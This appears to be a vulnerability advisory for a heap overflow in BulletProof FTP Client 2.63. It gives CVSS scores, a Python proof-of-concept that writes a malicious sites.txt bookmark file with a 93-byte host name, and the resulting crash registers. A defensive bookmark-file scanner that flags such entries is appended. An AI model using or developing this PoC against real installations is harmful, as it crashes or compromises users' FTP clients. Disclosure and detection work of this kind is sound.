BulletProof FTP Client 2.63 Local Heap Overflow PoC

2009.01.02
Credit: His0k4
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python
#
# [+] Application : BulletProof FTP (Client) V2.63
#
# [+] Vendor URL : http://www.bpftp.com/
#
# [+] Bug : BulletProof FTP Client Local Heap Overflow (PoC)
#
# [+] Author : His0k4
#
# [+] Greetings : All friends & Muslims Hackers (dz)
#---------------------------------------------------------------------------------
# EAX 41414141
# ECX 016EC370
# EDX 00000000
# EBX 41414141
# ESP 0012F548
# EBP 0012F5C4 ASCII "AAAAAAAAAAAA"
# ESI 0170E70A ASCII "]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EDI 0170E90A ASCII 03,"ftp"
# EIP 00596423 bpftpcli.00596423
#---------------------------------------------------------------------------------

header1 = "; This file was exported from BulletProof FTP Client vBulletProof FTP Client v2.63 (Build 56)\n"
header2 = "; Sitename=test site\n"
buff = "FTP://user:pass@" + "\x41" * 93

vuln = header1 + header2 + buff

try:
    out_file = open("sites.txt",'w')
    out_file.write(vuln)
    out_file.close()
    raw_input("\nBookmark file created!\n\nNow import the file and run it\n\nPress to exit...")
except:
    print "Error!"

# EoF
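
A pre-import check for bookmark files of the kind the PoC writes, as an added example that is not part of the original advisory or the vendor's code. It assumes entries are lines beginning with `FTP://` and that `;` lines are headers, as in the PoC's `sites.txt`; the function names, `MAX_LINE` and the sample input are constructed, and the host test uses the general DNS limits (63 bytes per label, 253 per name), not a documented BulletProof FTP buffer size.

```python
import re

# Assumption: entries look like the PoC's line, "FTP://user:pass@host...".
ENTRY = re.compile(r"^ftp://(?:([^@/\s]*)@)?([^/:\s]*)", re.IGNORECASE)
# One DNS label: 1 to 63 bytes, letters/digits/underscore, inner hyphens allowed.
LABEL = re.compile(r"^[A-Za-z0-9_](?:[A-Za-z0-9_-]{0,61}[A-Za-z0-9_])?$")
MAX_HOST = 253   # DNS limit on a full host name
MAX_LINE = 1024  # constructed sanity cap, not a documented limit

def check_host(host):
    """Return a reason string if host is not a plausible DNS name or IPv4
    address, else None."""
    if not host:
        return "empty host"
    if len(host) > MAX_HOST:
        return "host longer than %d bytes" % MAX_HOST
    for label in host.rstrip(".").split("."):
        if not LABEL.match(label):
            return "invalid or over-long label (%d bytes)" % len(label)
    return None

def scan_bookmarks(text):
    """Return (line number, reason) for every suspicious entry line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(";"):
            continue  # blank or header/comment line
        if len(stripped) > MAX_LINE:
            findings.append((lineno, "line longer than %d bytes" % MAX_LINE))
            continue
        m = ENTRY.match(stripped)
        if not m:
            continue  # not an FTP entry; outside this check's scope
        reason = check_host(m.group(2))
        if reason:
            findings.append((lineno, reason))
    return findings

# Constructed sample: one benign entry and one shaped like the PoC's entry.
SAMPLE = (
    "; Sitename=test site\n"
    "FTP://user:pass@ftp.example.org\n"
    "FTP://user:pass@" + "A" * 93 + "\n"
)

if __name__ == "__main__":
    for lineno, reason in scan_bookmarks(SAMPLE):
        print("line %d: %s" % (lineno, reason))
```

Running a check like this over untrusted `sites.txt` files before import flags the PoC's entry because its 93-byte host is a single label longer than DNS allows.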

References:

http://www.securityfocus.com/bid/33007

